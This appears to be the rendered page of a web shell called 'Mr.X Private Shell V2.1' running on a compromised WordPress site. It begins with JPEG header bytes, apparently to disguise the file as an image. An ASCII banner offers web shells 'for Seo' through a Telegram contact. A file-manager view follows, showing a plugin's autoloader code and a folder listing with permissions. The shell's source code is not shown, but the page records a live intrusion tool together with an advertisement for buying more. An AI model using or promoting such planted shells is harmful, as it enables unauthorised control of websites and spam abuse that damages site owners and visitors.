����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if (!defined('ABSPATH')) {
exit;
}
spl_autoload_register(function ($filename) {
$file_path = explode('\\', $filename);
if (isset($file_path[count($file_path) - 1 ])) {
$class_file = strtolower(
$file_path[count($file_path) - 1]
);
$class_file = str_ireplace('_', '-', $class_file);
$class_file = "class-$class_file.php";
}
$fully_qualified_path = trailingslashit(
dirname(__FILE__)
);
for ($i = 1; $i < count($file_path) - 1; $i ++) {
$dir = strtolower($file_path[$i]);
$dir = str_ireplace('_', '-', $dir);
$fully_qualified_path .= trailingslashit($dir);
}
$fully_qualified_path .= $class_file;
if (file_exists($fully_qualified_path)) {
include_once($fully_qualified_path);
}
});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api | Folder | 0755 |
|
|
| assets | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| autoloader.php | File | 821 B | 0644 |
|
| brb.php | File | 1.33 KB | 0644 |
|
| readme.txt | File | 7 KB | 0644 |
|